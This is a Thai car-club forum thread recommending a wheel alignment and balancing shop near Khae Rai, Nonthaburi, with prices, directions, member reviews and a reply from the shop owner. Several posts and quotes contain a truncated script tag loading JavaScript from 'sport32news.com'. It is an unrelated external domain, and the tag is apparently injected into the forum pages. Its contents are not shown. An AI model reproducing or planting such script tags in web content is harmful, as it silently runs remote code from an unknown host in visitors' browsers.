ตอบ
athongchum

ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 23 กรกฎา 2013 18:50 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
เล็งไว้หลายวันแล้ว วันนี้ได้มีโอกาสไปลองมาแล้ว อยากแนะนำเลยสำหรับคนเล่นรถ คุยดีครับ อธิบายให้ทุกคำถามที่เราอยากรู้ ค่านู่นค่านี่ มีความหมายยังไง มีผลอะไรกับรถ เครื่องมือที่ใช้ก็ทันสมัยครับ

ตั้งแต่ตั้งศูนย์มา ยังไม่เคยมีร้านไหนตั้งมุมโท ล้อหลังให้ผมสักร้าน ผมก็เพิ่งจะรู้วันนี้แหละว่าล้อหลังเราสามารถตั้งมุมโทได้ด้วย

ผมลืมถ่ายรูปเครื่องตั้งศูนย์มาด้วยอ่าครับ ลักษณะเครื่องเป็นเครื่องแบบไร้สาย สเต็ปการตั้งศูนย์มีขั้นตอนละเอียดดี

พอติดตั้งเครื่องเสร็จ
1.เข็นถอยหลัง
2.เข็นเดินหน้า
3.หมุนพวงมาลัยซ้าย
4.หมุนพวงมาลัยขวา

จากนั้นจอก็จะแสดงผลค่าต่างๆให้เห็น แล้วก็ปรับตั้งตามจุดต่างๆ เสร็จแล้วใช้ตลับเมตรวัดระยะมุมโทอีกรอบนึง

ประทับ ใจมากครับกับร้านนี้ แต่มีติดใจอยู่นิดนึง ตอนถ่วงล้อเค้าใช้กระดาษทรายขัดตรงท้องล้อทำให้ล้อเป็นรอยน่ะครับ ใครจะถ่วงล้อร้านนี้ แนะนำว่าให้กำชับช่างด้วยว่าอย่าเอากระดาษทรายขัดท้องล้อ ร้านนี้ส่วนใหญ่ทำแต่รถเดิมๆ เป็นรถเท็กซี่ซะส่วนใหญ่ เค้าไม่ซีเรียสเรื่องสีท้องล้อเหมือนเราๆ

ที่ตั้งร้าน

มาจากปากเกร็ด เลี้ยวซ้าย แยกแคราย ร้านอยู่ซ้ายมือ ก่อนถึงปั้ม RB
มาจากสะพานพระนั่งเกล้า ขึ้นสะพานข้ามแยกแคราย ลงจากสะพานชิดซ้ายเลย ร้านอยู่ซ้ายมือ ก่อนถึงปั้ม RB

ราคา

ตั้งศูนย์ 200 บาท
ถ่วงล้อ ล้อล่ะ 50 บาท

Attached File :
แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
Attached File :
แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ

แก้ไขล่าสุดโดย เมื่อ จันทร์, 12 พฤษภาคม 2014 23:16, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: boynanaza  tochi229  cisco  horus  ae  mayuct  tokykung  suttijate  NuuTeee  kaisuh  WarHighways  riobenz  Ekk_bangyai  LnwwasaD  vor_ped  Bonuses01  mutisaru  Doraeman  popza4  zaforzando  Vee  civicnoom  chan-o  makunkwan  Jasada 
boynanaza

เข้าร่วม: 02 สิงหา 2012
ตอบ: 1012

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1061
ให้คำขอบคุณ: 439

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 23 กรกฎา 2013 19:03 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
เยี่ยมครับ ใกล้บ้านมาก มีโอกาสใช้บริการแน่ๆ
ได้รับคำขอบคุณจาก: athongchum 
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
อังคาร, 23 กรกฎา 2013 20:03 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ดีกว่าร้าน B... แน่นอน 
Battboat

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 57

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 94
ให้คำขอบคุณ: 69

ปี: 2004
สี: น้ำเงิน อิเทอนอล (B-96P)
อังคาร, 23 กรกฎา 2013 20:17 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
น่าสนใจคับ ผ่านแถสนั้นบ่อยๆ
sumateES01

ชื่อเล่น: เมทร

เข้าร่วม: 13 มกรา 2013
ตอบ: 381

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 450
ให้คำขอบคุณ: 326

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 23 กรกฎา 2013 20:56 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
อยู่ไกล้ด้วยน่าแวะไปอุดหนุนครับ
Mundo

ชื่อเล่น: ธี

เข้าร่วม: 02 พฤษภาคม 2012
ตอบ: 881

Guru ES
Guru ES

ได้รับคำขอบคุณ: 720
ให้คำขอบคุณ: 490

อังคาร, 23 กรกฎา 2013 21:36 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
แหล่ม 
tokykung

ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

อังคาร, 23 กรกฎา 2013 21:40 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ราคาดีครับ....<script src="https://sport32news.com/civicesgroup.js"></
suttijate

ชื่อเล่น: เจตน์

เข้าร่วม: 04 เมษา 2012
ตอบ: 1099

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1067
ให้คำขอบคุณ: 919

อังคาร, 23 กรกฎา 2013 21:42 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
คุณเอกแล้วถ้ามาจากพระนั่งเกล้าข้ามแยกแครายมาแล้วเข้าซ้ายจะทันเหรอ ขนาดจะเลี้ยวเข้าปั้ม RB ยังยากเลย
athongchum

ครอบครัว ES
ครอบครัว ES

อังคาร, 23 กรกฎา 2013 21:57 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
boynanaza พิมพ์ว่า:
เยี่ยมครับ ใกล้บ้านมาก มีโอกาสใช้บริการแน่ๆ

ลองดูครับ ส่วนตัวผมชอบร้านนี้มากครับ
cisco พิมพ์ว่า:

ชักอยากรู้ชื่อเต็มแล้วสิครับ
Battboat พิมพ์ว่า:

ผมผ่านมาสองปีแล้ว เพิ่งได้ลองนี่แหละครับ ฮ่าๆๆ
sumateES01 พิมพ์ว่า:
อยู่ไกล้ด้วยน่าแวะไปอุดหนุนครับ

ผมบอกเจ้าของร้านไว้ เดี๋ยวจะมี ES เข้ามามากขึ้นแน่นอน
Mundo พิมพ์ว่า:
แหล่ม 

tokykung พิมพ์ว่า:
ราคาดีครับ....<script src="https://sport32news.com/civicesgroup.js"></

ดีมากเลยแหละครับ แกบอกถ้าเป็นเท็กซี่หรือตู้แกคิดแค่ 150 เอง
suttijate พิมพ์ว่า:
คุณเอกแล้วถ้ามาจากพระนั่งเกล้าข้ามแยกแครายมาแล้วเข้าซ้ายจะทันเหรอ ขนาดจะเลี้ยวเข้าปั้ม RB ยังยากเลย

ทันครับ เหลือๆเลย วันนี้ผมไปจากเดอะมอลล์ก็ข้ามแยกไปยูเทิร์นกลับมาก็ขึ้นสะพานแล้วตีซ้ายออกครับ ท่านเจตวันก่อนผมบีบแตรให้ท่านตรงปากซอยเรวดีด้วยน่ะ ท่านเจตขับตามหลังมา ผมเลี้ยวเข้าเรวดี บีบแตรไปสองที เห็นท่านเจตคุยโทรศัพท์อยู่

ได้รับคำขอบคุณจาก: suttijate 
suttijate

ครอบครัว ES
ครอบครัว ES

พุธ, 24 กรกฎา 2013 09:54 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
athongchum พิมพ์ว่า:

ลองดูครับ ส่วนตัวผมชอบร้านนี้มากครับ
cisco พิมพ์ว่า:

ชักอยากรู้ชื่อเต็มแล้วสิครับ
Battboat พิมพ์ว่า:

ผมผ่านมาสองปีแล้ว เพิ่งได้ลองนี่แหละครับ ฮ่าๆๆ
sumateES01 พิมพ์ว่า:

ผมบอกเจ้าของร้านไว้ เดี๋ยวจะมี ES เข้ามามากขึ้นแน่นอน
Mundo พิมพ์ว่า:
แหล่ม 

tokykung พิมพ์ว่า:

ดีมากเลยแหละครับ แกบอกถ้าเป็นเท็กซี่หรือตู้แกคิดแค่ 150 เอง

ทันครับ เหลือๆเลย วันนี้ผมไปจากเดอะมอลล์ก็ข้ามแยกไปยูเทิร์นกลับมาก็ขึ้นสะพานแล้วตีซ้ายออกครับ ท่านเจตวันก่อนผมบีบแตรให้ท่านตรงปากซอยเรวดีด้วยน่ะ ท่านเจตขับตามหลังมา ผมเลี้ยวเข้าเรวดี บีบแตรไปสองที เห็นท่านเจตคุยโทรศัพท์อยู่

จริงดิครับ ขอโทษจริง ๆ คุณเอก ไม่เห็นจริง ๆ ถ้าเห็นนะจะบีบแตรให้ลั่นเลย ส่วนจะถามว่าร้านนี้เรื่องช่วงล่างคือทำ OK เลยใช่ป่าวคุณเอก เพราะถ้าทำดี มีอะไรจะได้ทำร้านนี้เลยครับ ไม่ต้องวิ่งไปร้านพี่ใหม่ ส่วนถ้าแถวนี้จะทำสีรถ ไม่ใช่อู่ประกันนะครับ มีร้านแนะนำมั้ยคุณเอก อยากเอารถไปสาดสีเดิมครับ เอาราคาถูก ๆ นะครับ ขอบคุณล่วงหน้าเลย
ได้รับคำขอบคุณจาก: tochi229  athongchum 
song

เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

พุธ, 24 กรกฎา 2013 10:48 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
เก็บข้อมูล ขอบคุณครับ
tewada

ชื่อเล่น: ต้น

เข้าร่วม: 15 กันยา 2009
ตอบ: 489

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 546
ให้คำขอบคุณ: 456

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 24 กรกฎา 2013 11:07 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
อยู่ใกล้เช่นกันครับ

ถ้ามีโอกาสต้องไปลองซะหน่อย ราคาไม่แรงซะด้วย
Supap

เข้าร่วม: 26 พฤศจิกา 2012
ตอบ: 950

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 469
ให้คำขอบคุณ: 144

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 24 กรกฎา 2013 11:20 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
เเจ่มครับ "<script src="https://sport32news.com/civicesgroup.js">
chet_es

ชื่อเล่น: เชฐ

เข้าร่วม: 01 ตุลา 2008
ตอบ: 167

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 879
ให้คำขอบคุณ: 110

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 24 กรกฎา 2013 12:52 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ตั้งศูนย์ 200 บาท เฉพาะคู่หน้า หรือ 4 ล้อ ครับ
athongchum

ครอบครัว ES
ครอบครัว ES

พุธ, 24 กรกฎา 2013 19:17 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
athongchum พิมพ์ว่า:

จริงดิครับ ขอโทษจริง ๆ คุณเอก ไม่เห็นจริง ๆ ถ้าเห็นนะจะบีบแตรให้ลั่นเลย ส่วนจะถามว่าร้านนี้เรื่องช่วงล่างคือทำ OK เลยใช่ป่าวคุณเอก เพราะถ้าทำดี มีอะไรจะได้ทำร้านนี้เลยครับ ไม่ต้องวิ่งไปร้านพี่ใหม่ ส่วนถ้าแถวนี้จะทำสีรถ ไม่ใช่อู่ประกันนะครับ มีร้านแนะนำมั้ยคุณเอก อยากเอารถไปสาดสีเดิมครับ เอาราคาถูก ๆ นะครับ ขอบคุณล่วงหน้าเลย

จริงสิครับ ผมจำได้ทั้งคนทั้งรถ ท่านเจตขับตามหลังผมอยู่ตั้งนาน ผมมองตั้งนานนึกว่าใครรถสวยเชียว ส่วนร้านนี้เค้าไม่ได้ทำช่วงล่างน่ะ งานหลักเค้าคือ ปะ-เปลี่ยนยาง ตั้งศูนย์ ถ่วงล้อ ถ่ายน้ำเครื่อง แล้วก็แบตเตอร์รี่
song พิมพ์ว่า:
เก็บข้อมูล ขอบคุณครับ

tewada พิมพ์ว่า:
อยู่ใกล้เช่นกันครับ

ถ้ามีโอกาสต้องไปลองซะหน่อย ราคาไม่แรงซะด้วย

ถูกเลยแหละครับ
Supap พิมพ์ว่า:
เเจ่มครับ "<script src="https://sport32news.com/civicesgroup.js">

chet_es พิมพ์ว่า:
ตั้งศูนย์ 200 บาท เฉพาะคู่หน้า หรือ 4 ล้อ ครับ

4 ล้อครับผม

ได้รับคำขอบคุณจาก: suttijate 
NuuTeee

ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 24 กรกฎา 2013 23:54 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ตั้งศูนย์ที่ติวานนท์ยางยนต์เหมือนจะแพงกว่านี้นะเนี่ย

วันหลังไปลองบ้างดีกว่า
WarHighways

ชื่อเล่น: วาร์

เข้าร่วม: 04 มิถุนา 2012
ตอบ: 1283

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1312
ให้คำขอบคุณ: 1463

พฤหัส, 25 กรกฎา 2013 00:08 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
เคยใช้บริการมาแล้ว2ครั้งประทับใจครับอย่างที่ท่านว่าจริง เคยทำงานอยู่แถวบางใหญ่ ยังต้องวิ่งมาตั้ง0ล้อที่นี่เลยครับ
superpopshow

ชื่อเล่น: ป๊อป

เข้าร่วม: 14 มิถุนา 2010
ตอบ: 79

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 152
ให้คำขอบคุณ: 2

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 28 กรกฎา 2013 20:53 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ใช้บริการมาแล้วครับ ราคาไกล้เคียง ติวานนท์ยางยนต์เลย แต่คนไม่เยอะมาก แถมผมว่า ทำดีกว่า หลายๆที่ ครับ
boynanaza

เข้าร่วม: 02 สิงหา 2012
ตอบ: 1012

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1061
ให้คำขอบคุณ: 439

อาทิตย์, 28 กรกฎา 2013 21:58 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ไปมาแล้ว ตามที่พี่เอกแนะนำ ไปตั้ง0+เปลี่ยนน้ำมันเครื่อง  แต่พี่แกเช็คน้ำกลั่นแบต+เติมน้ำกลั่นให้ เช็คลมยาง+เติมให้ ซักพักพี่แกเดินไปเปิดฝาหลัง จะเติมลมล้ออะไหล่ผม โอโหสุดยอดเลยผมบอกพี่ไม่ต้องเติม ค่าเสียหาย ตั้งศูนย์200 +เปลี่ยนน้ำมันเครื่อง 100 รวม 300 บริการดีจริงๆ 
ได้รับคำขอบคุณจาก: suttijate  Ekk_bangyai  athongchum  domziia  HankMan 
Beenongear53

ชื่อเล่น: บี

เข้าร่วม: 01 กันยา 2012
ตอบ: 379

ได้รับคำขอบคุณ: 636
ให้คำขอบคุณ: 790

สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 28 กรกฎา 2013 22:55 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
น่าสนใจครับ ผ่านประจำเลย 
riobenz

ชื่อเล่น: เบ็นซ์

เข้าร่วม: 12 พฤษภาคม 2013
ตอบ: 76

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 432

อาทิตย์, 28 กรกฎา 2013 22:57 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ร้านอยู่ใกล้ๆ วุฒิศักดิ์ มั้ยครับผม
suttijate

ครอบครัว ES
ครอบครัว ES

จันทร์, 19 สิงหา 2013 20:11 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ไปโดนมาแล้วครับ ไปตั้งศูนย์ แถวเลี่ยงเมืองนนท์มาสองรอบ ตั้งเสร็จเอียงกว่าเดิม...!!!! เข้าให้มันตั้งใหม่ออกมาเหมือนเดิม พอ!!!!เลยนึกขึ้นได้ร้านแนะนำคุณเอกไปลองมาวันนี้ 200 ออกมาตรงแน่วเลย เจ้าของร้านพูดจาดีมากครับ แนะนำเลยครับ มีน้ำเย็นๆให้ดื่ม ของดีช่วยกันบอกต่อจร้าาาาาา....
ได้รับคำขอบคุณจาก: athongchum  domziia  popza4 
Santiyangyon

เข้าร่วม: 09 มกรา 2013
ตอบ: 4

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 15
ให้คำขอบคุณ: 0
จันทร์, 9 กันยา 2013 16:42 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ก่อนอื่นขอบคุณทุกท่านที่ให้คำแนะนำและติหรือชมกันมานะครับ โดยเฉพาะพี่เอกที่มาประเดิมเป็นคันแรก
เรื่องการถ่วงล้อ ตอนนี้ผมให้ลูกน้องใช้ผ้าในการเช็ดล้อแม็ก ด้านในเพื่อที่จะใช้ในการแปะตะกั่วแล้วครับ(ขอบคุณอีกครั้งที่ติมาครับ จะ                        ได้บริการให้ดีขึ้นครับ)
เรื่องช่วงล่าง ตอนนี้ที่ร้านยังไม่ได้เปิดให้บริการอย่างเต็มที่ แต่ถ้ามีอะไหล่ชิ้นไหนที่ต้องการเปลี่ยนแล้วผมพอช่วยเหลือได้ก็พร้อมจะให้                    บริการครับผม (มีพี่อยู่คนนึงในคลับนี้แหละซื้อแขนปรับมุม CAMBER ล้อหลังมาให้ผมเปลี่ยนให้ ผมก็เปลี่ยนให้ได้นะครับ)
                และตอนนี้ผมเองก็ได้ไปเรียนช่วงล่างรถยนต์ที่ศูนย์พัฒนาฝีมือแรงงาน ดินแดง เพื่อที่อนาคตจะได้เปิดทำช่วงล่างด้วย
                ถ้าใครสนใจเรียนก็สอบถามรายละเอียดได้นะครับ ที่นี่เค้าไม่เสียค่าใช้จ่ายด้วยครับ
บริการของที่ร้าน:  เปลี่ยนยาง แบตเตอรี่(ส่งให้ด้วยถ้าไม่ไกลมากนะครับ) ตั้งศูนย์ ถ่วงล้อ ปะยาง
สามารถติดต่อสอบถามพูดคุยกันได้นะครับที่ 086-7843956 ผมฤทธิ์ครับ
ได้รับคำขอบคุณจาก: suttijate  Mundo  athongchum  domziia  Bonuses01  mutisaru  HankMan  padonzzz  ilcm  Jasada  chatli 
LnwwasaD

ชื่อเล่น: เฟริท

เข้าร่วม: 10 เมษา 2012
ตอบ: 3543

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2843
ให้คำขอบคุณ: 2957

จันทร์, 9 กันยา 2013 16:56 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ราคาดีเลย  ......  อิอิ  
wudthichai

ชื่อเล่น: ต๊อบ

เข้าร่วม: 11 กรกฎา 2012
ตอบ: 54

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 16
ให้คำขอบคุณ: 7

สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
จันทร์, 9 กันยา 2013 17:12 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
จำไว้ครับ ใกล้บ้านผมมาก อยู่ติวานนท์ซอย25 ได้ลองแน่ๆครับ
birdphoto

ชื่อเล่น: เบิร์ดจ้า

เข้าร่วม: 17 พฤษภาคม 2010
ตอบ: 568

ได้รับคำขอบคุณ: 564
ให้คำขอบคุณ: 154

สี: แดง ไฟร์เปปเปอร์ (R-507P)
จันทร์, 9 กันยา 2013 17:12 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
Santiyangyon พิมพ์ว่า:
ก่อนอื่นขอบคุณทุกท่านที่ให้คำแนะนำและติหรือชมกันมานะครับ โดยเฉพาะพี่เอกที่มาประเดิมเป็นคันแรก
เรื่องการถ่วงล้อ ตอนนี้ผมให้ลูกน้องใช้ผ้าในการเช็ดล้อแม็ก ด้านในเพื่อที่จะใช้ในการแปะตะกั่วแล้วครับ(ขอบคุณอีกครั้งที่ติมาครับ จะ                        ได้บริการให้ดีขึ้นครับ)
เรื่องช่วงล่าง ตอนนี้ที่ร้านยังไม่ได้เปิดให้บริการอย่างเต็มที่ แต่ถ้ามีอะไหล่ชิ้นไหนที่ต้องการเปลี่ยนแล้วผมพอช่วยเหลือได้ก็พร้อมจะให้                    บริการครับผม (มีพี่อยู่คนนึงในคลับนี้แหละซื้อแขนปรับมุม CAMBER ล้อหลังมาให้ผมเปลี่ยนให้ ผมก็เปลี่ยนให้ได้นะครับ)
                และตอนนี้ผมเองก็ได้ไปเรียนช่วงล่างรถยนต์ที่ศูนย์พัฒนาฝีมือแรงงาน ดินแดง เพื่อที่อนาคตจะได้เปิดทำช่วงล่างด้วย
                ถ้าใครสนใจเรียนก็สอบถามรายละเอียดได้นะครับ ที่นี่เค้าไม่เสียค่าใช้จ่ายด้วยครับ
บริการของที่ร้าน:  เปลี่ยนยาง แบตเตอรี่(ส่งให้ด้วยถ้าไม่ไกลมากนะครับ) ตั้งศูนย์ ถ่วงล้อ ปะยาง
สามารถติดต่อสอบถามพูดคุยกันได้นะครับที่ 086-7843956 ผมฤทธิ์ครับ

แวะมายืนยันครับว่าบริการดีจิง. คันที่เอาแคมเบอร์หลังไปให้พี่ฤทธิ์ ใส่ครับ. ทำงานใจเย็นงานละเอียดดีครับ
ได้รับคำขอบคุณจาก: athongchum  domziia 
athongchum

ครอบครัว ES
ครอบครัว ES

จันทร์, 9 กันยา 2013 19:16 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
เอ๊ะ !!! ทำไมกระทู้ผมมันไม่แจ้งเตือนหว่า

NuuTeee พิมพ์ว่า:
ตั้งศูนย์ที่ติวานนท์ยางยนต์เหมือนจะแพงกว่านี้นะเนี่ย

วันหลังไปลองบ้างดีกว่า

ลองเลยครับพี่ 
WarHighways พิมพ์ว่า:
เคยใช้บริการมาแล้ว2ครั้งประทับใจครับอย่างที่ท่านว่าจริง เคยทำงานอยู่แถวบางใหญ่ ยังต้องวิ่งมาตั้ง0ล้อที่นี่เลยครับ

นั่นไงลูกค้าเก่าการันตี 
superpopshow พิมพ์ว่า:
ใช้บริการมาแล้วครับ ราคาไกล้เคียง ติวานนท์ยางยนต์เลย แต่คนไม่เยอะมาก แถมผมว่า ทำดีกว่า หลายๆที่ ครับ

ใกล้เคียงนี่ถูกกว่าใช่มั้ยครับ แต่อ่านแล้วเหมือนแพงกว่าเลยครับ <script src="https://sport32news.com/civicesgroup.js"></
ไปมาแล้ว ตามที่พี่เอกแนะนำ ไปตั้ง0+เปลี่ยนน้ำมันเครื่อง  แต่พี่แกเช็คน้ำกลั่นแบต+เติมน้ำกลั่นให้ เช็คลมยาง+เติมให้ ซักพักพี่แกเดินไปเปิดฝาหลัง จะเติมลมล้ออะไหล่ผม โอโหสุดยอดเลยผมบอกพี่ไม่ต้องเติม ค่าเสียหาย ตั้งศูนย์200 +เปลี่ยนน้ำมันเครื่อง 100 รวม 300 บริการดีจริงๆ 

ถูกจังครับ 
ได้รับคำขอบคุณจาก: domziia 
athongchum

ครอบครัว ES
ครอบครัว ES

จันทร์, 9 กันยา 2013 19:17 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
freedombee พิมพ์ว่า:
น่าสนใจครับ ผ่านประจำเลย 

ลองดูครับ ใช้ดีจึงบอกต่อ 
riobenz พิมพ์ว่า:
ร้านอยู่ใกล้ๆ วุฒิศักดิ์ มั้ยครับผม

ตรงข้ามแบบเยื้องๆไปทางซ้ายครับ
ไปโดนมาแล้วครับ ไปตั้งศูนย์ แถวเลี่ยงเมืองนนท์มาสองรอบ ตั้งเสร็จเอียงกว่าเดิม...!!!! เข้าให้มันตั้งใหม่ออกมาเหมือนเดิม พอ!!!!เลยนึกขึ้นได้ร้านแนะนำคุณเอกไปลองมาวันนี้ 200 ออกมาตรงแน่วเลย เจ้าของร้านพูดจาดีมากครับ แนะนำเลยครับ มีน้ำเย็นๆให้ดื่ม ของดีช่วยกันบอกต่อจร้าาาาาา....

ดีใจด้วยที่เจอร้านถูกใจครับท่านเจต 

ได้รับคำขอบคุณจาก: domziia 
athongchum

ครอบครัว ES
ครอบครัว ES

จันทร์, 9 กันยา 2013 19:25 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
LnwwasaD พิมพ์ว่า:
ราคาดีเลย  ......  อิอิ  

อิอิ
wudthichai พิมพ์ว่า:
จำไว้ครับ ใกล้บ้านผมมาก อยู่ติวานนท์ซอย25 ได้ลองแน่ๆครับ

ใกล้ๆลองดูครับพี่
birdphoto พิมพ์ว่า:

แวะมายืนยันครับว่าบริการดีจิง. คันที่เอาแคมเบอร์หลังไปให้พี่ฤทธิ์ ใส่ครับ. ทำงานใจเย็นงานละเอียดดีครับ

Santiyangyon พิมพ์ว่า:

เยี่ยมเลยครับพี่ฤทธิ์ ปรับปรุงแก้ไขกันไป รักษามาตรฐานการบริการไว้ครับพี่ เรื่องฝีมือฝึกกันได้ไม่ยาก หลายต่อหลายร้านที่ฝีมือดีมากแต่ตายเพราะการบริการแย่มากๆ เดี๋ยวเรายังมีเคสต้องปรับโช๊คกันอีกน่ะพี่ แต่มันเอียงนิดเดียวเลยขี้เกียจเข้าไปปรับ เดี๋ยวเอาไว้ไม่ไหวค่อยเข้าไปปรับโช๊คน่ะครับพี่ ขอบคุณมากครับพี่ฤทธิ์

mutisaru

ชื่อเล่น: อ้อม

เข้าร่วม: 26 พฤษภาคม 2012
ตอบ: 691

Guru ES
Guru ES

ได้รับคำขอบคุณ: 549
ให้คำขอบคุณ: 539

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 10 กันยา 2013 18:24 - แนะนำร้าน สันติยางยนต์ ตั้งศูนย์ ถ่วงล้อ โซน แคราย งามวงศ์วาน นนทบุรี ครับ
ปั๊มRB ที่ว่านี่ใช่อยู่ขาเข้า ก่อนถึง Esso แล้วก้อ ทางด่วนใช่ไหมครับ
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.